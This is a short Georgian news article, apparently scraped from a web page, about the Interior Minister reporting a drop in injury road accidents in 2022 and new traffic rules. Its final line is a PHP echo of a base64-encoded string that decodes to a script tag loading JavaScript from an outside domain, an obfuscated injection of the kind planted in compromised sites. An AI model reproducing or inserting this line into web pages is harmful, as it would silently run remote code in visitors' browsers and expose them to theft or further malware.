celsiusi
ავერსი საქკაბელი

2022 წელს, ავტოსაგზაო შემთხვევების რიცხვი, რა დროსაც დაფიქსირდა სხეულის დაზიანება, 394 ფაქტით შემცირდა - ამის შესახებ შინაგან საქმეთა მინისტრმა, ვახტანგ გომელაურმა პარლამენტში, „მინისტრის საათის“ ფორმატში მოხსენებით გამოსვლისას განაცხადა. მისივე თქმით, ბოლო წლებში საგზაო-სატრანსპორტო შემთხვევათა კლების ტენდენციაა. მინისტრმა თქმით, საგზაო ინფრასტრუქტურის განვითარებისა და არაერთი გატარებული რეფორმის მიუხედავად, ავტოსაგზაო შემთხვევები კვლავ გამოწვევად რჩება.

„წლის ბოლოს საქართველოს პარლამენტმა მიიღო საქართველოს შინაგან საქმეთა სამინისტროს ავტორობით მომზადებული და საქართველოს მთავრობის მიერ ინიცირებული კანონპროექტები, რომელთა მიხედვითაც გამკაცრდა სატრანსპორტო საშუალების მართვის დარღვევებზე საკანონმდებლო რეგულაციები, ამასთანავე,
განისაზღვრა უცხო ქვეყნის სახელმწიფო სანომრე ნიშნის მქონე სატრანსპორტო საშუალების მძღოლისთვის საჯარიმო ქვითრის ჩაბარების წესი.

საგზაო მოძრაობის უსაფრთხოების გაუმჯობესების მიზნით და ევროკავშირთან ასოცირების ხელშეკრულების ფარგლებში განხორციელებული ცვლილების თანახმად, 2022 წლიდან, სატრანსპორტო საშუალების მართვის უფლების მისაღები გამოცდის პრაქტიკული ნაწილი ორეტაპიანი გახდა. ასევე, სავალდებულო გახდა მოპედისა და მსუბუქი კვადროციკლის რეგისტრაცია“, - განაცხადა ვახტანგ გომელაურმა.

346
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");